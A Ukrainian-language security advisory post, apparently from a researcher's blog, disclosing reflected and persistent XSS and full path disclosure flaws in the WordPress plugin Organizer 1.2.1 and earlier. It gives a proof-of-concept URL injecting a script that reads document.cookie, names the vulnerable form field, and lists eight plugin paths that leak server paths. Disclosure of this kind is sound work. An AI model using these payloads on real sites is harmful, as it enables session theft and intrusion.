XSS та FPD уразливості в Organizer для WordPress
23:54 21.04.201214.04.2012
Ще 27.09.2006 я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні Organizer для WordPress (одразу як почав ним користуватися). Але довго відкладав публікацію інформації про дані уразливості. Це перша порція уразливостей в плагіні Organizer. Про що найближчим часом повідомлю розробникам плагіна.
Стосовно уразливостей в плагінах для WP раніше я писав про уразливості в Register Plus Redux для WordPress.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.
21.04.2012
XSS:
http://site/wp-admin/admin.php?page=organizer/page/users.php&delete_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Persistent):
POST запит на сторінці http://site/wp-admin/admin.php? page=organizer/page/users.php в полі “File extensions allowed”. Код виконається на сторінці users.php плагіна.
FPD:
http://site/wp-content/plugins/organizer/plugin_hook.php
http://site/wp-content/plugins/organizer/page/index.php
http://site/wp-content/plugins/organizer/page/dir.php
http://site/wp-content/plugins/organizer/page/options.php
http://site/wp-content/plugins/organizer/page/resize.php
http://site/wp-content/plugins/organizer/page/upload.php
http://site/wp-content/plugins/organizer/page/users.php
http://site/wp-content/plugins/organizer/page/view.php
Уразливі Organizer 1.2.1 та попередні версії.
Як заявив мені розробник плагіна, він більше не підтримує цей плагін і не буде виправляти численні уразливості в ньому, про які я повідомив. Тому користувачам даного плагіна потрібно буде власноруч виправляти всі уразливості.